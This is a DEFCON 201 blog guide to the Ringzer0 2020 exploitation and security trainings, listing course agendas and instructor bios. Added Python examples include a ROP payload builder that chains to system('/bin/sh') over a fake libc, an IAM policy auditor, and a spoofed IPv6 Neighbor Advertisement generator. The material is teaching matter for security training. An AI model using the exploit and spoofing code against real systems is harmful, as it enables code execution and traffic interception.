Welcome to the DEFCON 201 guide to Ultimate Hacker Summer Camp! This is part of a series where we are going to cover all the various hacker conventions and shenanigans in August. As more blog posts are uploaded, you will be able to jump through the guide via these links:
ULTIMATE HACKER SUMMER CAMP — Part One: HOPE 2020
ULTIMATE HACKER SUMMER CAMP — Part Two: RightsCon
ULTIMATE HACKER SUMMER CAMP — Part Three: Black Hat USA
ULTIMATE HACKER SUMMER CAMP — Part Four: RingZer0
ULTIMATE HACKER SUMMER CAMP — Part Five: DEFCON Safe Mode
ULTIMATE HACKER SUMMER CAMP — Part Six: USENIX
RINGZERO 2020 ONLINE TRAININGS
Date: Saturday, August 1st — Friday August 14th
Website: https://ringzer0.training/
Platform(s): UNKNOWN
Schedule: https://ringzer0.training/index.html#instructors
Live Streams:
N/A
Chat: Discord (Invite N/A)
Accessibility: Only registered attendees will be able to take part in the Training Labs and Discord.
Tickets: https://ringzer0.regfox.com/ringzer0-2020-registration
Code Of Conduct: N/A
Highly vetted infosec trainings with plenty of time for hands-on practice, answering students’ questions, and knowledge sharing. Take your skills to the next level with Ringzer0.
Learn. Connect. Enjoy.
As a result of COVID-19, Ringzer0 is now offering its training online to ensure the safety of our students, instructors, and staff. Train from the comfort of your own home with our top Ringzer0 instructors. Their practical and interactive classes will be conveniently offered as a hybrid live instructor-led and self-paced learning format to accommodate time zone differences.
Ringzer0 is something new to Hacker Summer Camp: a series of high-end professional trainings for the hacker that has the coin to pay for them. Black Hat prices, DEF CON skills: each of these workshops runs over multiple days on one single subject. For those with deep pockets who are at an intermediate level, with a few certs or bounties under their belt, and want to progress to uber-advanced 1337, this is the hacking crucible for you!
The Ringzer0 2020 RiskRecon scholarship fund is now accepting applications! Our scholarship is designed to further opportunities for women in cybersecurity, support their professional development and educational goals, and help them thrive in the industry. If you are interested in applying for a scholarship, please submit your application to us no later than July 23, 2020. Recipients will be notified at least a week before the beginning of August.
Cancellation policy: 60+ days before the event 75% of fees refunded; 30–60 days before event 50% refunded, less than 30 days 0% refunded. Course changes are allowed up to 14 days before event start (some restrictions will apply). Attendee changes can be accommodated up to 14 days prior to the event.
DEFCON 201 RINGZER0 COURSE HIGHLIGHTS
These are some of the multi-day course trainings that stood out to us. Space is limited and this is not the full list, so RSVP ASAP and look at the full list of trainings on their website: https://ringzer0.training/index.html#instructors
Zero To Leet — 64-bit Linux Exploitation
4 Day u_long 32 CPE Hour Training: August 2020
AUG 1,2,4,6 [click for important details!]
Abstract
Zero to Leet brings you an intense 32 hour course featuring a practical hands-on approach to exploit development on 64-bit Linux systems. This class is perfectly suited for students who are new to exploit development and want to break into the field of offensive security.
Our beginner level class kicks off with an introduction to x64 Intel architecture and assembly language, static analysis of vulnerable userland x64 binaries using IDA Pro, and GDB debugging techniques for dynamic analysis. Next, we’ll exploit stack-based buffer overflows where we will write shellcode from the ground up to gain code execution. Then we’ll bypass exploit mitigation techniques like XN/DEP using Return Oriented Programming (ROP). Labs will be conducted in a virtual environment for analysis and exploitation. Students will leave with the necessary hands-on experience, knowledge, and confidence to discover and exploit 0-day vulnerabilities in modern software.
SUGGESTED COMBO: HEAPLAB — GLIBC HEAP EXPLOITATION
Key Learning Objectives
- Introduction to the x64 Intel architecture
- Exploring x64 Intel assembly language
- Understanding how functions work
- Static analysis using IDA Pro
- Debugging and dynamic analysis on 64-bit Linux systems
- Decompiling binaries using Snowman
- Understanding common vulnerability classes
- Exploiting buffer overflows on the stack and heap
- Writing shellcode from the ground up
- Introduction to exploit mitigation techniques like XN/DEP
- Introduction to Return Oriented Programming
- Bypassing exploit mitigation using ROP
- Writing exploits to bypass ASLR
Who Should Attend
- Students with little to no experience in how to find and exploit software vulnerabilities
- Students who want to become security researchers or work in the field of offensive security
- Students familiar with 32-bit binary exploitation who want to upgrade their skills to 64-bit platforms
- Bug Hunters who want to write exploits for all the crashes they find.
- Members of reverse engineering research teams who want to learn exploit development
Agenda
Module 1:
- Introduction to the x64 Intel architecture
- Exploring x64 Intel assembly language
- EXERCISES — Examples in x64 Intel Assembly Language
- Understanding how functions work
- Static analysis of vulnerable 64-bit binaries using IDA Pro
- Debugging and dynamic analysis on 64-bit Linux systems
- EXERCISES — Static and Dynamic Analysis labs
Module 2:
- Introduction to stack-based buffer overflows
- Exploiting Stack Overflows
- EXERCISES — Stack Overflow exploitation
- Introduction to heap-based buffer overflows
- Introduction to heap exploitation
- EXERCISES — Exploiting heap vulnerabilities
Module 3:
- Writing Shellcode from the ground up
- Introduction to Exploit Mitigation Techniques (XN/DEP)
- Introduction to Return Oriented Programming
- EXERCISES — Bypassing XN/DEP using ROP
- ROP Tools
- EXERCISES — Searching for ROP Gadgets
- ROP Chaining
- EXERCISES — Exploit featuring ROP Chains
Module 4:
- Introduction to Exploit Mitigation Techniques (ASLR)
- Bypassing ASLR
- EXERCISES — Exploit featuring ASLR Defeats
- EXERCISE — Exploit combining DEP + ASLR bypasses
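Modules 3 and 4 end with a chain that beats DEP and ASLR together, and on the exploit-script side that is a small amount of arithmetic: locate gadget offsets in a copy of the target library, rebase them from one leaked pointer, and pack the chain behind the padding that reaches the saved return address. The following Python 3 is an added example written for this guide, not course material from Ringzer0 or Hahna Latonick (the course itself lists Python 2.7). The "library" it searches is a constructed byte string, and PUTS_OFF, SYSTEM_OFF and BUF_SIZE are made-up values standing in for what you would read out of the real libc and the real crash.

```python
import struct

# Constructed stand-in for a libc image. Against a real target this search runs
# over the actual library bytes (ROPgadget-style tools do the same thing with a
# disassembler behind them so they can report gadgets that end in any ret).
FAKE_LIBC = (
    b"\x90" * 0x100
    + b"\x5f\xc3"              # offset 0x100: pop rdi ; ret   (offset 0x101 is a bare ret)
    + b"\x90" * 0x31
    + b"/bin/sh\x00"           # offset 0x133: argument string for system()
    + b"\x90" * 0x400
)

# Assumed symbol offsets for this pretend libc build (made up for the example).
# PUTS_OFF is the offset of the function whose address the target leaks;
# SYSTEM_OFF is the call target of the chain. Normally both come from nm/readelf.
PUTS_OFF = 0x420
SYSTEM_OFF = 0x4f0
BUF_SIZE = 64      # size of the vulnerable stack buffer (assumed)
SAVED_RBP = 8      # saved frame pointer sits between the buffer and the return address


def find_gadget(image, pattern):
    """Lowest offset of the byte pattern in the image; raises if it is absent."""
    off = image.find(pattern)
    if off < 0:
        raise LookupError("gadget %r not found" % pattern)
    return off


def libc_base_from_leak(leaked_puts):
    """ASLR slides the whole library as a unit, so one leaked pointer fixes its base.
    A mapped library starts on a page boundary; anything else means the assumed
    offset belongs to a different libc build than the one on the target."""
    base = leaked_puts - PUTS_OFF
    if base & 0xfff:
        raise ValueError("leak minus offset is not page aligned; wrong libc build?")
    return base


def p64(value):
    return struct.pack("<Q", value)


def build_payload(leaked_puts):
    """Padding up to the return address, then: ret ; pop rdi ; "/bin/sh" ; system."""
    base = libc_base_from_leak(leaked_puts)
    ret = base + find_gadget(FAKE_LIBC, b"\xc3")
    pop_rdi = base + find_gadget(FAKE_LIBC, b"\x5f\xc3")
    binsh = base + find_gadget(FAKE_LIBC, b"/bin/sh\x00")
    system = base + SYSTEM_OFF
    chain = (
        p64(ret)       # lone ret keeps rsp 16-byte aligned at the call; glibc's system() faults otherwise
        + p64(pop_rdi)
        + p64(binsh)   # popped into rdi, the first argument register
        + p64(system)
    )
    return b"A" * (BUF_SIZE + SAVED_RBP) + chain


def decode_chain(payload):
    """Unpack the 8-byte slots that follow the padding, for inspection."""
    words = payload[BUF_SIZE + SAVED_RBP:]
    return [struct.unpack("<Q", words[i:i + 8])[0] for i in range(0, len(words), 8)]


if __name__ == "__main__":
    LEAK = 0x7f3c12345420   # pretend puts@libc address leaked from the target
    for addr in decode_chain(build_payload(LEAK)):
        print(hex(addr))
```

The page-alignment check is the one practitioners skip and regret: a leak that rebases to an unaligned address almost always means the offsets were taken from a different libc than the target's, and the chain will crash somewhere confusing instead of here.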
Pre-requisites
- Have a working knowledge of C programming and Python 2.7
- Knowledge of computer architecture and x86 is preferred
- Familiarity with navigating Linux environments and command line knowledge
- If none of the above apply, then enough patience to go through the pre-class tutorials.
Pre-class Tutorials
The following tutorials have been specially prepared to get students up to speed on essential concepts before coming to class.
- C Programming https://www.learn-c.org
- Python https://www.codecademy.com/learn/learn-python
- x86 Refresher http://www.cs.virginia.edu/~evans/cs216/guides/x86.html
Hardware Requirements
- A working laptop (no Netbooks, no Tablets, no iPads)
- Intel Core i3 (equivalent or superior) required
- 8GB RAM required, at a minimum
- Wireless network card
- 40 GB free Hard disk space
Software Requirements
- Linux / Windows / Mac OS X desktop operating systems
- IDA 7 Freeware. The free version is sufficient.
- Snowman Decompiler. Free download here.
- VMware Workstation or Fusion. The free 30-day trial is sufficient.
- Ubuntu 14.04 64-bit virtual machine. This can be downloaded here.
- Administrator / root access MANDATORY
Students will be provided with
Students will be provided with access to course slides, sample code, and lab exercises which attendees can take with them to continue learning and practicing after the training ends.
Hahna Latonick
For the past 14 years of her engineering career, Hahna Kane Latonick has worked throughout the defense industry specializing in cybersecurity as a computer security researcher for the Department of Defense and other defense contracting companies. She has been featured as a cybersecurity subject matter expert on Fox Business News, ABC, U.S. News and World Report, and other national media outlets. She has led three tech startups teaching computer security while also serving as CTO of two of them. She has trained and developed security researchers at one of the top five aerospace and defense industry companies. She has also taught at the Security BSides Orlando conference. In 2014, she became a DEFCON CTF finalist, placing in 6th and ranking in the top 1.5% of ethical hackers worldwide. She also holds a CISSP and CEH certification. Latonick attended Swarthmore College and Drexel University where she earned her B.S. and M.S. in Computer Engineering along
HeapLAB — GLIBC Heap Exploitation
4 Day u_long 32 CPE Hour Training: August 2020
AUG 8,9,11,13 [click for important details!]
Abstract
For nearly 20 years, exploiting memory allocators has been something of an art form. Become a part of that legacy with HeapLAB.
The GNU C Library (GLIBC) is a fundamental part of most Linux desktop and many embedded distributions; its memory allocator is used in everything from starting threads to dealing with I/O. Learn how to leverage this vast attack surface with more than 10 different heap exploitation techniques, from the original “Unsafe Unlink” to the beautiful overflow-to-shell “House of Orange” and eventually to the cutting-edge “House of Corrosion”. In this hands-on course, students will alternate between learning new techniques and developing their own exploits based on what they’ve learned.
SUGGESTED COMBO: INTRODUCTION TO 64-BIT EXPLOIT DEVELOPMENT
Key Learning Objectives
- Introduction to the GLIBC memory allocator: “malloc”
- The history of GLIBC heap exploitation
- Understanding and bypassing different heap exploit mitigations
- Hijacking the flow of execution with heap exploits
- Leaking information with heap corruption
- Learning the “Houses” of heap exploitation
- Scripting heap exploits with pwntools
- Debugging heap implementations with GDB
Who Should Attend
- CTF team members who want to take on Linux heap challenges
- Linux exploit developers who want to add another string to their bow
- Anyone interested in “weird machines”
Agenda
Session 1
- An introduction to GLIBC and its memory allocator
- GLIBC heap exploitation history
- Tools of the trade
- GDB and pwndbg
- The pwntools library
- The “House of Force” technique
- The malloc() function
- The “top” chunk
- Hijacking the flow of execution
- Malloc’s hooks
- “One-gadgets”
- The “Fastbin Dup” technique
- The free() function
- Malloc’s fastbins
- Arenas
- Defeating the fastbins double-free mitigation
- Dealing with the fastbins size field check
- CHALLENGE: “fastbin dup 2”
Session 2
- The “Unsafe Unlink” technique
- Malloc’s unsortedbin
- Chunk coalescing
- Defeating the “safe unlinking” checks
- The “House of Orange” technique
- File stream exploitation
- The “Unsortedbin Attack”
- Top chunk extension
- Sorting
- Info leaks via the heap
- Leaking heap addresses
- Leaking libc addresses
- CHALLENGE: one-byte
- Leverage a one-byte overflow against a modern pwnable
Session 3
- The “House of Spirit” technique
- Passing corrupted values to free()
- Designing fake chunks
- The “House of Lore” technique
- Poisoning the unsortedbin
- Poisoning the smallbins
- Poisoning the largebins
- The “House of Einherjar” technique
- The “House of Rabbit” technique
- The malloc_consolidate() function
- Moving fake chunks between bins
- Project Zero’s “Poison Null Byte” technique
- CHALLENGE: poison null byte
- Leverage a single null byte overflow against a modern pwnable
Session 4
- The “House of Corrosion” technique
- Reviving the “House of Prime”
- Defeating libio vtable integrity checks
- Leveraging partial malloc metadata overwrites
- Triggering file stream exploits via failed asserts
- The Tcache
- The “Tcache Dup” technique
- Defeating the tcache double-free mitigation
- CHALLENGE: “tcache troll”
- Leverage a double-free against a modern pwnable
- BONUS CHALLENGE: “optimize”
Pre-requisites
- Confidence using command line tools
- Some basic Python scripting skills
- Familiarity with a debugging environment e.g. GDB
Hardware Requirements
- Laptop — powerful enough to run VMs
- 8GB RAM minimum
- 35GB free HDD space minimum
- USB-A slot or dongle to copy VM
Software Requirements
- Windows / Linux / macOS
- One of the following virtualization suites:
- VMWare Player
- VMWare Workstation
- VMWare Fusion
- VirtualBox
Max Kamper
Max Kamper is a researcher and exploit developer. A former Royal Marines Commando, Max was a member of the Information Exploitation Group’s electronic warfare squadron. Having traded radio signals for process signals, he now specializes in exploit development against Linux platforms. Max is also the author of the ROP Emporium website, a resource for learning practical x86 return-oriented programming.
Advanced Browser Exploitation
4 Day u_long 32 CPE Hour Training: August 2020
AUG 1–7 [click for important details!]
Abstract
Web browsers are among the most utilized consumer-facing software products on the planet. As the ubiquitous gateway to the internet, browsers introduce significant risk to the integrity of personal computing devices. In the race to protect users while advancing web technology, premier browsers have become increasingly complex targets to compromise. Over the course of this training, students will receive a thorough introduction to vulnerability research as it pertains to modern web browsers. This includes identifying, evaluating, and weaponizing the latest vulnerability patterns via the exploitation of several recently patched vulnerabilities. Through this, students will experience the end-to-end process of developing memory corruption based exploits against these high value targets. This course will focus specifically on Google Chrome and Apple Safari.
Key Learning Objectives
- Identify contemporary vulnerability patterns in web browsers
- Become familiar with the architecture of modern web browsers
- Build an in-depth understanding of browser internals and JavaScript engines
- Develop an understanding of target-specific exploit techniques
- Weaponize real-world vulnerabilities
- Execute renderer-only attacks to hijack user sessions
- Obtain a high level overview of browser sandboxing
Who Should Attend
This training is designed for vulnerability researchers who want to learn about browser internals in the context of security as well as contemporary JavaScript exploitation techniques.
Agenda
Module 1: Browser Architecture (General, Chrome, Safari/Webkit)
- Breaking down modern browser architectures, major components
- Setting up a browser research environment, building, debugging
- Interfacing with different components of the browser (DOM, JS)
- Introduction to JavaScript engines
- A deep-dive into JavaScript engine internals
- Low-level JavaScript types and natives
Module 2: JavaScript Internals in Exploitation (General, V8, JSC)
- Garbage collection implementations
- Current vulnerability patterns found in JS engines
- Introduction to exploit building blocks (Primitives)
- Leveraging JavaScript vulnerability classes
- Layering exploit primitives
Module 3: JavaScript JIT Compilers (General, V8)
- Overview of JavaScript JIT compiler pipelines
- Exploring JIT debugging tools
- Optimizations and typing
- Type cache and speculation
- JIT vulnerability classes, contemporary exploits
Module 4: JavaScript Exploit Engineering (General, V8, JSC)
- Constructing arbitrary memory primitives
- Overwriting JIT structures and control flow hijacking
- Continuation of execution
- Bypassing browser-specific mitigations
- UXSS, SOP bypasses, and renderer-only attacks
- N-Day exploitation
Pre-requisites
Attendees should be familiar with modern exploitation subjects (memory corruption, bug classes, DEP, ASLR, ROP), a working knowledge of C++ and JavaScript, some exposure to AMD64 assembly or low level systems, and Linux command line proficiency. This training will require a laptop which is able to connect to the Internet and perform SSH and VNC to a remote server.
Amy Burnett, RET2 Systems
Amy is a senior security researcher and co-founder of RET2 Systems, where she specializes in research of browser security and mitigation bypass. She has spoken about and previously led trainings on advanced browser exploitation at private events and several conferences. She and her team developed and publicly demonstrated a remote code execution exploit against Safari on macOS for Pwn2Own 2018, which also leveraged a macOS bug to gain root level
AWS Security Training
2 Day u_short 16 CPE Hour Training: August 2020
AUG 3,4 [click for important details!]
Abstract
2 days of advanced, fast paced Amazon Web Services (AWS) training. You’ll learn how to assess AWS accounts, how to secure them, and best practices for ensuring they stay secure. You’ll learn how to detect attackers and how to respond to incidents on AWS.
Key Learning Objectives
- Be able to identify security misconfigurations and risks in AWS accounts
- Understand how AWS auditing tools work and their limitations
- Be able to review IAM policies and resource policies
- Know the different log sources on AWS and their limitations
- Learn techniques for analyzing logs using jq and Athena
- Understand what GuardDuty looks for and what additional detections you can create
- Know the publicly available attack tools, techniques, and public security incidents of companies that have been breached while running on AWS
- Learn best practices for running securely on AWS
Who Should Attend
This is useful for security teams securing their own AWS environments, incident responders, pentesters, developers, and more. This training is fast paced and densely packed.
Testimonials
“Just finished a truly excellent AWS security training by @0xdabbad00. Well delivered, lean and super useful.” -Claudio Criscione
“Cloud security is complex, and confusing the first time you look at it. Scott’s AWS training was clearly structured, well-delivered, and helped me ramp up way more quickly than I could have on my own.” -Thomas Dullien (halvarflake)
“If you’re looking for serious AWS Security training @0xdabbad00 from @SummitRoute is your guy. Highly recommend considering this if your security teams are still scratching their heads on how to tame clouds, or believe they figured it all out.” -Karim El-Melhaoui
Agenda
Day 1:
- Overview of AWS: Shared responsibility model, unofficial rules AWS has held true with customers
- Disaster recovery; outages; SLAs
- S3 bucket policies and ACLs
- Other resources with policies and that can become public
- Logs: CloudTrail, CloudWatch Events, VPC Flow Logs
- GuardDuty
- Using jq and Athena
- Incident response
Day 2:
- Access keys and metadata service
- How IAM works: Understanding policies, ABAC, mistakes AWS has made, IAM boundaries, SCPs
- How common open-source security tools work: CloudMapper, CloudTracker, RepoKid, Security Monkey, Cloud Custodian, and more
- How to audit AWS accounts
- Known attack tools and techniques
- Known incidents of companies running on AWS
- Best practices when running on AWS
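The Day 2 policy review is mechanical enough to automate a first pass. The following Python is an added example for this guide, not Scott Piper's tooling and not part of the course; the two policy documents are constructed, and the checks are the ones an auditor runs before reading the rest by hand: wildcard principals on resource policies (with and without a narrowing Condition), NotAction grants, unconditioned `*` on `*`, service-wide wildcards, and iam:PassRole / sts:AssumeRole on every resource. The severity labels are this example's own, not AWS terminology.

```python
import json


def _as_list(value):
    """Most IAM fields may be a single string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_anyone(principal):
    """'Principal': '*' and 'Principal': {'AWS': '*'} both mean every AWS principal."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def review_policy(doc, resource_policy=False):
    """Return (severity, sid, message) findings for the Allow statements of a policy.

    resource_policy=True enables the Principal check, which only applies to
    bucket/key/queue policies; identity policies carry no Principal element."""
    findings = []
    for n, stmt in enumerate(_as_list(doc.get("Statement"))):
        sid = stmt.get("Sid") or "Statement[%d]" % n
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        conditioned = bool(stmt.get("Condition"))

        if resource_policy and _principal_is_anyone(stmt.get("Principal")):
            # A Condition (source VPC endpoint, org ID, ...) narrows this; still worth a look.
            findings.append(("LOW" if conditioned else "HIGH", sid,
                             "grants access to any principal" + (" (conditioned)" if conditioned else "")))

        if "NotAction" in stmt:
            findings.append(("HIGH", sid, "NotAction allows everything except the listed actions"))

        if "*" in actions and "*" in resources and not conditioned:
            findings.append(("CRITICAL", sid, "Action * on Resource * with no Condition"))
        elif any(a.endswith(":*") for a in actions) and "*" in resources:
            findings.append(("MEDIUM", sid, "service-wide wildcard actions on every resource"))

        for a in actions:
            if a.lower() in ("iam:passrole", "sts:assumerole") and "*" in resources:
                findings.append(("HIGH", sid, "%s on Resource * is a privilege-escalation path" % a))
    return findings


# Constructed bucket policy (a resource policy): one world-readable statement and
# one that is open to any principal but pinned to a VPC endpoint.
BUCKET_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::example-bucket",
     "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}}}
  ]
}
""")

# Constructed identity policy attached to a deploy role.
ROLE_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "Deploy", "Effect": "Allow",
     "Action": ["ec2:*", "iam:PassRole"], "Resource": "*"},
    {"Sid": "Everything", "Effect": "Allow", "NotAction": "iam:*", "Resource": "*"},
    {"Sid": "DenyDelete", "Effect": "Deny", "Action": "s3:DeleteBucket", "Resource": "*"}
  ]
}
""")


if __name__ == "__main__":
    for sev, sid, msg in review_policy(BUCKET_POLICY, resource_policy=True):
        print("bucket  %-8s %-12s %s" % (sev, sid, msg))
    for sev, sid, msg in review_policy(ROLE_POLICY):
        print("role    %-8s %-12s %s" % (sev, sid, msg))
```

A Deny statement is deliberately skipped rather than scored: it can only narrow what the Allows grant, and the interesting question for a reviewer is what the Allows grant on their own. Real accounts layer SCPs and permission boundaries on top of this, which is exactly why the agenda lists them separately.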
Pre-requisites
You should have some minimal experience using AWS, such as knowing what an EC2 instance or S3 bucket are. Only a laptop is needed. Labs will use the browser and EC2 Instance Connect (web-based SSH terminal).
Scott Piper, SummitRoute
Scott is an independent consultant helping companies secure their AWS environments, through private 2-day trainings, assessments, custom software development, and more. He holds all 5 associate and professional AWS certifications, plus the AWS Security Specialist certificate.
Scott has over a decade of experience doing infosec work, from developing tools to help people secure their networks, to securing those networks himself. He has worked at the NSA and as the Director of Security for a cybersecurity startup.
Scott Piper developed flAWS.cloud, flAWS2.cloud, CloudMapper, CloudTrac
IPv6 Network Security With Scapy
2 Day u_short 16 CPE Hour Training: August 2020
AUG 1–4 [click for important details!]
Abstract
Depending on who you ask and how you look at it, IPv6 can be considered either a minor or a major evolution from IPv4, especially on the security front. What is clear is that the introduction and deployment of IPv6, and the resulting mix of IPv4 and IPv6, create security vulnerabilities and windows of opportunity for attackers.
Course Description
Continuously updated since 2009, this training mixes theory and practice in order to achieve an immediate application of the material. The different topics developed during the training are the result of discussions with students from companies, governmental entities and universities. They reflect typical IPv6 practical issues.
Starting from the basics, we will learn IPv6 security together, along with practical attacks using Scapy, a powerful packet manipulation library for which Guillaume developed the IPv6 support and of which he is one of the official maintainers.
This training aims at providing a full understanding of IPv6 attacks and defense mechanisms. No previous IPv6 knowledge is required, as the instructor will go through the protocol in detail.
Many practical lab sessions allow you to manipulate all the concepts presented during the training. You will learn to master Scapy and build your own IPv6 attacks against real targets.
All labs are performed on virtual architectures. Everyone can experiment at their own pace, and test attacks without impacting the other participants. These architectures are ideally suited to remote teaching. The console used by students is also accessible by the instructor who can comment and take over the keyboard to provide instant advice.
At the end of the training, you will fully understand IPv6 and realize that it is not “just a small change in the network”, as it impacts a lot of systems and applications.
Course Topics
- Introduction to IPv6 and Scapy
- Overview of IPv6 tools
- IPv4 issues
- IPv6 differences
- IPv6 addresses
- The IPv6 protocol
- The ICMPv6 protocol
- The Neighbor Discovery Protocol
- DNS and IPv6
- The MLD Protocol
- IPv6 Network Enumeration
- Link local attacks
- Triggering an IPv6 CVE with Scapy
- Fuzzing IPv6 Implementations with AFL
- Protecting IPv6 networks
- Transition mechanisms
- Hardening Recommendations
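Neighbor Discovery spoofing, the classic link-local attack on the topics list, is a one-liner in Scapy (roughly `IPv6()/ICMPv6ND_NA()/ICMPv6NDOptDstLLAddr()`), which is convenient but hides what actually goes on the wire. The following Python is an added example written for this guide, not from the course and not Scapy code: it builds the same unsolicited Neighbor Advertisement by hand, including the ICMPv6 checksum over the IPv6 pseudo-header, and parses it back. The addresses and MAC are made up, and the example only constructs the bytes; putting them on the wire needs a raw socket or Scapy's send().

```python
import ipaddress
import struct

ICMPV6_NA = 136            # ICMPv6 type: Neighbor Advertisement (RFC 4861)
OPT_TARGET_LLADDR = 2      # NDP option type: Target Link-layer Address
FLAG_ROUTER = 0x80000000
FLAG_SOLICITED = 0x40000000
FLAG_OVERRIDE = 0x20000000


def ones_complement_sum(data):
    """16-bit one's complement sum with end-around carry (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xffff) + (total >> 16)
    return total


def pseudo_header(src, dst, length):
    """IPv6 pseudo-header (RFC 8200 s8.1): src, dst, upper-layer length, 3 zero bytes, next header 58."""
    return (ipaddress.IPv6Address(src).packed + ipaddress.IPv6Address(dst).packed
            + struct.pack("!I", length) + b"\x00\x00\x00\x3a")


def icmpv6_checksum(src, dst, icmp):
    """Checksum field value for an ICMPv6 message whose checksum bytes are currently zero."""
    return 0xffff ^ ones_complement_sum(pseudo_header(src, dst, len(icmp)) + icmp)


def verify_checksum(src, dst, icmp):
    """A correct ICMPv6 message sums to 0xffff together with its pseudo-header."""
    return ones_complement_sum(pseudo_header(src, dst, len(icmp)) + icmp) == 0xffff


def build_na(src, dst, target, mac, solicited=False, override=True, router=False):
    """Neighbor Advertisement: type, code, checksum, R/S/O flags, target address, TLLA option."""
    flags = ((FLAG_ROUTER if router else 0) | (FLAG_SOLICITED if solicited else 0)
             | (FLAG_OVERRIDE if override else 0))
    # Option length is in units of 8 bytes: 2 header bytes + 6-byte MAC = 1 unit.
    option = bytes([OPT_TARGET_LLADDR, 1]) + bytes.fromhex(mac.replace(":", ""))
    body = (struct.pack("!BBHI", ICMPV6_NA, 0, 0, flags)
            + ipaddress.IPv6Address(target).packed + option)
    return body[:2] + struct.pack("!H", icmpv6_checksum(src, dst, body)) + body[4:]


def parse_na(icmp):
    """Decode an NA back into its fields, walking the TLV options (RFC 4861 s4.6)."""
    ntype, code, _csum, flags = struct.unpack("!BBHI", icmp[:8])
    if ntype != ICMPV6_NA:
        raise ValueError("not a Neighbor Advertisement")
    info = {
        "target": str(ipaddress.IPv6Address(icmp[8:24])),
        "router": bool(flags & FLAG_ROUTER),
        "solicited": bool(flags & FLAG_SOLICITED),
        "override": bool(flags & FLAG_OVERRIDE),
        "lladdr": None,
    }
    off = 24
    while off + 8 <= len(icmp):
        otype, olen = icmp[off], icmp[off + 1]
        if olen == 0:
            raise ValueError("zero-length NDP option")   # RFC 4861: such packets must be discarded
        if otype == OPT_TARGET_LLADDR:
            info["lladdr"] = ":".join("%02x" % b for b in icmp[off + 2:off + 8])
        off += olen * 8
    return info


if __name__ == "__main__":
    # Made-up lab addresses: the attacker claims the router's link-local address for its
    # own MAC, sent to all-nodes (ff02::1) with Override set so existing cache entries change.
    ATTACKER_LL, ROUTER_LL, ATTACKER_MAC = "fe80::bad:cafe", "fe80::1", "02:00:00:00:00:01"
    pkt = build_na(ATTACKER_LL, "ff02::1", ROUTER_LL, ATTACKER_MAC)
    print(pkt.hex())
    print(verify_checksum(ATTACKER_LL, "ff02::1", pkt), parse_na(pkt))
```

Two details matter for the defensive half of the course: the checksum covers the IPv6 source and destination, so a spoofed NA has to be consistent with the header it rides in, and the Override flag is what makes an unsolicited advertisement overwrite a host's neighbor cache rather than merely refresh it. RA Guard and ND inspection on the switch exist precisely because nothing in the packet itself authenticates the sender.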
Prerequisites
The lab exercises are based on a virtual machine hosted in the cloud. You have to bring your own laptop, preferably running Linux (native or virtualized), and have a working SSH client ready. If you run it inside a VM, make sure the operating system is working properly, especially the network component.
You don’t have to pre-install any tools.
You should understand basic TCP/IP routing and basic Linux network commands. No prior knowledge of IPv6 nor Scapy is required.
Guillaume Valadon
Guillaume Valadon is the head of security at Netatmo and holds a PhD in IPv6 networking. He likes looking at data and crafting packets. In his spare time, he co-maintains Scapy and learns reversing embedded devices. Also, he still remembers what AT+MS=V34 means!
Guillaume regularly gives technical presentations, classes and live demonstrations, and writes research papers for conferences and magazines.
Sensepost: Introduction To Red Teaming
2 Day u_short 16 CPE Hour Training: August 2020
AUG 4,5,6 [click for important details!]
Abstract
If you want to transition your penetration testing into red teaming to better emulate real criminal hacking campaigns, and ultimately show real impact, then this course is for you.
It is sometimes said that penetration testers emulate other penetration testers rather than real bad guys, leaving organisations exposed to what they miss.
This course aims to change that. By leveraging our experience in red teaming and business-critical compromises, we’ve put together a course to teach you how to test your organisation like a real criminal would.
No equipment other than a laptop is needed, however, our lab environment serves as the perfect place to level-up your traditional pentesting experience.
SUGGESTED COMBO: Q DIVISION — HARDWARE TOOLS FOR CLOSE QUARTER HACKING
This course is the result of our 19 years of experience giving training and will advance your ability to understand and compromise organisational networks. We’ve taken our red teaming approaches and combined them with real-life attacks to give you a wild two days of hardcore hands on hacking.
This is a very hands on course, and some of the topics and practical exercises include:
- Exploitation and gaining a foothold via phishing
- Malware delivery vectors using real samples, loaders and developing AV bypasses
- Privilege escalation and low noise persistence
- Advanced usage of tools like Empire, Metasploit and Covenant
- Dealing with different architectures and debugging “broken” tooling
- Lateral movement and living off the land
- Using the access you have to your advantage and challenging the myth of always needing administrator privileges
- Understanding tools vs detection trade offs
- Unusual C2s and hiding in plain sight (DNS, DNS over HTTPS, and Exchange based C2s)
- Emulating real threats by targeting financial systems.
Who should take this course
Penetration testers, network administrators, red/blue teams, security professionals, and IT security enthusiasts who have a need to acquaint themselves with real-world offensive tactics, techniques and tools.
Students will be provided with
- Access to our web class portal containing slides, practicals, walkthroughs and tools and prerequisites.
- Access to your own individual lab with numerous targets and capabilities, used for the practicals.
System Requirements
Students should bring a laptop that is capable of running an OpenVPN client, an SSH client and a Remote Desktop client.
Leon Jacobs, SensePost
Leon has been hacking for over a decade. He’s plied his trade at SensePost for the last three years having previously worked for a bank and ISP in South Africa. Leon spends most of his daytime hours hacking large networks or web and mobile applications. Leon spends most of his nighttime hours building hacking tools and techniques to contribute back to the community. He goes by @leonjza.